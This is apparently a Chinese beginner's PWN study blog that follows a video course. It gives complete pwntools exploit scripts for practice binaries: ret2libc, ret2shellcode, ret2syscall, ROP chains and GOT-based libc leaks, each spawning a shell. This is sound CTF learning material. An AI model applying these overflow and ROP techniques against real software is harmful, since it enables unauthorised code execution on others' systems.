PWN入门

PWN入门

拖了好久。。。
汇编底子不是很好。。。
做逆向也有一段时间了
对操作系统也有大概了解了
现在才敢尝试一下。。。
https://www.bilibili.com/video/BV1854y1y7Ro
经大佬推荐 看这个课入的门
因此本文所有题都是跟课程一致
但exp不同,我写exp的原则是少用“魔法值”

魔法值（会根据我看课的进度进行更新）

0. 0xdeadbeef：作为占位的垃圾数据（例如伪造的返回地址）。之所以不用 p32(0)，是因为当溢出由 strcpy 这类遇到 NUL 就停止拷贝的函数造成时，payload 里的 0x00 会把后面的内容截断。
所以尽量不要在 payload 中出现 0x00；只有在确认读入函数不会被 NUL 截断时，才可以用 p32(0) 之类的值。
1. gadget：给寄存器赋值或做栈平衡的小段指令（如 pop rdi; ret、ret）。它们的地址最好用 ROP(elf).find_gadget(...) 或 ROPgadget 从二进制里搜出来，而不是手抄一个常量，否则二进制一变就会静默失效。

ret2libc1

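#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""ret2libc1 (i386): return into system@plt with a "/bin/sh" found in the binary.

The overflow overwrites the saved return address; everything we need
(system and the string) is already reachable inside the binary, so no libc
leak is required.
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

elf = ELF('./ret2libc1')

# Search for the NUL-terminated string so the hit is a complete "/bin/sh"
# and not a prefix of some longer string.  StopIteration here means the
# binary does not actually contain it.
binsh = next(elf.search(b"/bin/sh\x00"))
# For an imported function this is the PLT stub, which is fine: we only
# need an address we can `ret` into that ends up calling system().
system = elf.symbols['system']

# 112 bytes of filler reach the saved return address (offset from the
# course / disassembly).  After that the layout mirrors a normal call:
#   [ system ] [ fake return address ] [ arg0 = &"/bin/sh" ]
# 0xdeadbeef is used as the fake return address (instead of 0) to keep the
# payload NUL-free, consistent with the other exploits in this write-up.
payload = b"A" * 112 + p32(system) + p32(0xdeadbeef) + p32(binsh)

io = process('./ret2libc1')
io.sendline(payload)

io.interactive()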

ret2shellcode

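#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""ret2shellcode (i386): return into shellcode the program copied into .bss.

The overflowing input is also copied into the global `buf2`; we put the
shellcode at the very start of the input and point the saved return address
at buf2 (this only works while that region is executable -- check with
`checksec` / `vmmap`).
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'


elf = ELF('./ret2shellcode')
# Address of the global copy of our input.  Using the symbol instead of
# elf.bss() + 0x40 removes a hand-computed offset (look at buf2 in IDA to
# see where the +0x40 came from).
bss = elf.symbols['buf2']

io = process('./ret2shellcode')

shellcode = asm(shellcraft.sh())
# The shellcode must fit in front of the saved return address; a negative
# pad length would silently produce an empty pad and a misaligned payload.
assert len(shellcode) <= 112, f"shellcode too long: {len(shellcode)} > 112"
# NOTE(review): the copy into buf2 presumably stops at the first NUL byte,
# so the shellcode itself should be NUL-free (the zero padding after it is
# not needed in the copy).  Warn rather than fail, in case it is not.
if b'\x00' in shellcode:
    log.warning("shellcode contains NUL bytes; the copy into buf2 may truncate it")

io.recvuntil(b'!!!')
# shellcode, zero-padded up to the return address, then &buf2.
payload = shellcode.ljust(112, b'\x00') + p32(bss)
io.sendline(payload)

io.interactive()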

ret2syscall

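#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""ret2syscall (i386): ROP chain performing execve("/bin/sh", 0, 0) via int 0x80.

Instead of calling system(), set up the i386 syscall convention ourselves:
  eax = 0xb (SYS_execve), ebx = &"/bin/sh", ecx = 0, edx = 0, then int 0x80.
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
# context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2syscall')
rop = ROP(elf)


def gadget(insns):
    """Address of the first gadget in the binary matching *insns*, or fail loudly."""
    g = rop.find_gadget(insns)
    assert g is not None, f"gadget not found: {insns}"
    return g.address


# Derive the gadgets from the binary instead of hard-coding addresses, so
# the script does not silently break if the binary is rebuilt.
pop_eax_ret = gadget(['pop eax', 'ret'])
pop_edx_ecx_ebx_ret = gadget(['pop edx', 'pop ecx', 'pop ebx', 'ret'])
int_0x80 = gadget(['int 0x80'])
# NUL-terminated search so the hit is a whole "/bin/sh".
binsh = next(elf.search(b"/bin/sh\x00"))

io = process('./ret2syscall')

SYS_execve = 0xb
chain = p32(pop_eax_ret) + p32(SYS_execve)
# pop order is edx, ecx, ebx: execve(ebx="/bin/sh", ecx=0, edx=0)
chain += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(binsh)
chain += p32(int_0x80)
# 112 bytes of filler reach the saved return address.
payload = b"A" * 112 + chain

io.sendline(payload)

io.interactive()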

ret2libc2

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""ret2libc2 (i386): read "/bin/sh" into a global buffer, then system() it.

This script does not search the binary for a "/bin/sh" string; it calls
gets(buf2) to read one in on a second input line and lets gets return
straight into system(buf2).
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2libc2')

# Global buffer that receives the string sent on the second line.
buf2 = elf.symbols['buf2']
gets = elf.symbols['gets']
system = elf.symbols['system']

binsh = b"/bin/sh\x00"

# Stack after the 112-byte filler, read top-down:
#   gets    <- first return target
#   system  <- gets' return address: we fall straight into system
#   buf2    <- gets' arg0, and later system's (fake) return address
#   buf2    <- system's arg0
# Sharing the slot between the two calls avoids needing a pop; ret gadget.
chain = [gets, system, buf2, buf2]
payload = b"A" * 112 + b"".join(p32(addr) for addr in chain)

io = process('./ret2libc2')

io.sendline(payload)
# Uncomment to break into the process between the two inputs:
# gdb.attach(io)
# pause()
io.sendline(binsh)

io.interactive()

ret2libc3

注意
io.sendline(str(elf.got['puts']).encode())
这里不能用 elf.symbols['puts']：对导入函数来说，symbols 给出的是二进制内 PLT 桩的地址；
而 elf.got['puts'] 才是 GOT 表项的地址，
程序按这个地址读出来的内容才是 puts 在 libc 中的真实地址。

这道题的溢出由 strcpy 造成，strcpy 遇到 0x00 就停止拷贝，因此 payload 中任何位置都不能出现 0x00：伪造的返回地址只能填 0xdeadbeef 这类不含零字节的垃圾值，不能用 p32(0)。

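#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""ret2libc3 (i386): leak puts' libc address via the program's "print the
value at address X" feature, then ret2libc into system("/bin/sh").

The overflow here is done by strcpy, so the payload must not contain any
0x00 byte (the copy would stop there).
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
# context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2libc3')
so = ELF('./libc-2.27.so')
# Run the binary under the bundled loader and libc so the leaked address and
# the offsets computed below refer to the same libc build.
io = process(['./ld-2.27.so', './ret2libc3'], env={"LD_PRELOAD": "./libc-2.27.so"})
io.recv()

# We want the GOT slot (elf.got), whose *content* is puts' libc address;
# elf.symbols['puts'] would give the PLT stub inside the binary instead.
puts_got = elf.got['puts']
log.info(f"puts@got = {puts_got:#x}")
io.sendline(str(puts_got).encode())
io.recvuntil(b": ")
leak = io.recvuntil(b'\n', drop=True)
puts_addr = int(leak, 16)  # int() accepts the "0x" prefix itself

libc_base = puts_addr - so.symbols['puts']
# libc is mapped page-aligned; an unaligned result means the leak was parsed
# wrongly or libc-2.27.so is not the libc the process is actually running.
assert libc_base & 0xfff == 0, f"unaligned libc base {libc_base:#x}"

# symbols is keyed by str, not bytes (the original b'system' would KeyError).
system = libc_base + so.symbols['system']
binsh = libc_base + next(so.search(b"/bin/sh\x00"))

# 60 bytes reach the saved return address; 0xdeadbeef is the NUL-free fake
# return address system() will "return" to afterwards.
payload = b"A" * 60 + p32(system) + p32(0xdeadbeef) + p32(binsh)
# strcpy stops at the first NUL, so a NUL anywhere here truncates the chain.
assert b'\x00' not in payload, "payload contains a NUL byte; strcpy would truncate it"

io.sendlineafter(b':', payload)

io.interactive()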

pwn0

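#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""pwn0 (level0, x86-64): return into the binary's own callsystem().

No arguments are needed, so the chain is a stack-realigning `ret` followed
by callsystem.
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

elf = ELF('./level0')
callsys_addr = elf.symbols['callsystem']

# Take the `ret` gadget from the binary rather than hard-coding its address.
ret_gadget = ROP(elf).find_gadget(['ret'])
assert ret_gadget is not None, "no `ret` gadget found in ./level0"
ret = ret_gadget.address

io = process('./level0')
io.recvuntil(b'World\n')

# 0x88 bytes reach the saved return address.  The extra `ret` realigns the
# stack to 16 bytes: on x86-64 (e.g. Ubuntu 18.04) system() otherwise
# crashes on an SSE instruction inside libc.  Without it the chain would be
# just p64(callsys_addr).
payload = b'A' * 0x88 + p64(ret) + p64(callsys_addr)
io.send(payload)

io.interactive()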

pwn1

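#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""pwn1 (level1, i386): the program leaks the buffer address, so return into
shellcode placed at the start of that buffer."""

import re

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

shellcode = asm(shellcraft.sh())
io = process('./level1')

# The first output line contains the buffer address as 0x...; pull it out
# with a regex instead of fixed slice offsets ([14:-2]) so a slightly
# different banner fails loudly instead of yielding a wrong address.
banner = io.recvline()
match = re.search(rb'0x[0-9a-fA-F]+', banner)
assert match is not None, f"no address in banner: {banner!r}"
buf_addr = int(match.group(0), 16)

# 0x88 bytes of buffer + 4 (presumably the saved ebp) reach the return
# address, which we point back at the buffer where the shellcode sits.
pad_len = 0x88 + 0x4 - len(shellcode)
assert pad_len >= 0, "shellcode does not fit in the buffer"
payload = shellcode + b'\x00' * pad_len + p32(buf_addr)
io.send(payload)
io.interactive()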

pwn2

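#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""pwn2 (level2, i386): ret2libc-style chain using the binary's own
system@plt and "/bin/sh" string."""

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

elf = ELF('./level2')
system = elf.symbols['system']
# NUL-terminated search so the hit is a whole "/bin/sh", not a prefix of a
# longer string.
binsh = next(elf.search(b'/bin/sh\x00'))

# 0x88 bytes of buffer plus 4 (presumably the saved ebp) reach the return
# address.  Then: system, NUL-free fake return address, arg0.
payload = b'a' * (0x88 + 0x4) + p32(system) + p32(0xdeadbeef) + p32(binsh)

io = process('./level2')
io.sendlineafter(b"Input:\n", payload)

io.interactive()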

pwn2_x64

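#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""pwn2_x64 (level2_x64): same idea as level2, but on x86-64 the first
argument travels in rdi, so a `pop rdi; ret` gadget is needed."""

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

# SysV x86-64 argument order: rdi, rsi, rdx, rcx, r8, r9; the rest on the stack.

elf = ELF("./level2_x64")
binsh = next(elf.search(b"/bin/sh\x00"))
system = elf.symbols["system"]

rop = ROP(elf)


def gadget(insns):
    """Address of the first gadget in the binary matching *insns*, or fail loudly."""
    g = rop.find_gadget(insns)
    assert g is not None, f"gadget not found: {insns}"
    return g.address


# Derived from the binary instead of hard-coded, so they cannot go stale.
pop_rdi_ret = gadget(['pop rdi', 'ret'])
ret = gadget(['ret'])

io = process("./level2_x64")
io.recvline()
# 0x80 bytes of buffer + 8 (presumably the saved rbp) reach the return
# address.  The leading `ret` realigns the stack to 16 bytes before
# system() is entered (needed e.g. on Ubuntu 18.04 x64, where system()
# crashes on a misaligned stack).
payload = b'A' * 0x80 + b"A" * 8 + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)
io.send(payload)
io.interactive()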

pwn3

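#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""pwn3 (level3, i386): leak a libc address with write@plt, then ret2libc.

Stage 1 overflows into write(1, &write@got, 4) and returns to
vulnerable_function for a second overflow; stage 2 is system("/bin/sh")
with addresses computed from the leak.
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

io = process("./level3")
# Offsets are taken from THIS libc; against a remote target they only hold
# if it runs the identical build (otherwise identify the libc from the
# leaked address first).
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
elf = ELF('./level3')

vulfun_addr = elf.symbols['vulnerable_function']
write_plt = elf.symbols['write']
write_got = elf.got['write']

# Stage 1, stack after the 0x88+4 filler:
#   write@plt        <- return target
#   vulfun_addr      <- write's return address: re-run the vulnerable function
#   1, write_got, 4  <- write(fd=1, buf=&write@got, n=4): leak write's libc address
payload1 = b'A' * (0x88 + 4) + p32(write_plt) + p32(vulfun_addr) + p32(1) + p32(write_got) + p32(4)

io.recvuntil(b"Input:\n")
io.sendline(payload1)

# recvn blocks until exactly the 4 leaked bytes have arrived; recv()[:4]
# could come back short if the output arrived in pieces.
write_addr = u32(io.recvn(4))
log.info(f"write@libc = {write_addr:#x}")

libc_base = write_addr - libc.symbols['write']
# libc is mapped page-aligned; anything else means the leak or the libc
# offsets are wrong, so stop before sending a garbage chain.
assert libc_base & 0xfff == 0, f"unaligned libc base {libc_base:#x}: wrong libc?"

system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: plain ret2libc, 0xdeadbeef as the NUL-free fake return address.
payload2 = b'A' * (0x88 + 4) + p32(system) + p32(0xdeadbeef) + p32(binsh)

io.sendline(payload2)

io.interactive()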

pwn3_x64

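#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""pwn3_x64 (level3_x64): leak write's libc address with write@plt, then
return into libc's system("/bin/sh").

Stage 1 calls write(1, &write@got, rdx) and returns into
vulnerable_function for a second overflow; stage 2 is pop rdi; ret -> system.
"""

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

io = process("./level3_x64")
# Offsets are taken from THIS libc; they only hold against a target running
# the identical build.
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf = ELF('./level3_x64')

vulfun_addr = elf.symbols['vulnerable_function']
write_plt = elf.symbols['write']
write_got = elf.got['write']

# SysV x86-64 argument order: rdi, rsi, rdx, rcx, r8, r9; the rest on the stack.
rop = ROP(elf)


def gadget(insns):
    """Address of the first gadget in the binary matching *insns*, or fail loudly."""
    g = rop.find_gadget(insns)
    assert g is not None, f"gadget not found: {insns}"
    return g.address


# Derived from the binary instead of hard-coded, so they cannot go stale.
pop_rdi_ret = gadget(['pop rdi', 'ret'])
pop_rsi_r15_ret = gadget(['pop rsi', 'pop r15', 'ret'])

# rdx (the length) is not set: the binary has no pop rdx gadget, and the
# author observed in gdb that rdx is still 200 at this point, which is plenty.
payload1 = (b'A' * (0x80 + 8)
            + p64(pop_rdi_ret) + p64(1)                       # rdi = stdout
            + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0)  # rsi = &write@got, r15 = junk
            + p64(write_plt)                                  # write(1, &write@got, rdx)
            + p64(vulfun_addr))                               # then overflow again

io.recvuntil(b"Input:\n")
io.sendline(payload1)

# The GOT entry is the first 8 of the leaked bytes; recvn waits for exactly
# 8 instead of hoping a single recv() returned at least that many.
write_addr = u64(io.recvn(8))
log.info(f"write@libc = {write_addr:#x}")

libc_base = write_addr - libc.symbols['write']
# libc is mapped page-aligned; anything else means the leak or the libc
# offsets are wrong, so stop before sending a garbage chain.
assert libc_base & 0xfff == 0, f"unaligned libc base {libc_base:#x}: wrong libc?"

system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2.  No extra `ret` was needed here; if system() crashes on a
# misaligned stack, insert a `ret` gadget before pop_rdi_ret.
payload2 = b'A' * (0x80 + 8) + p64(pop_rdi_ret) + p64(binsh) + p64(system)

io.sendline(payload2)

io.interactive()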
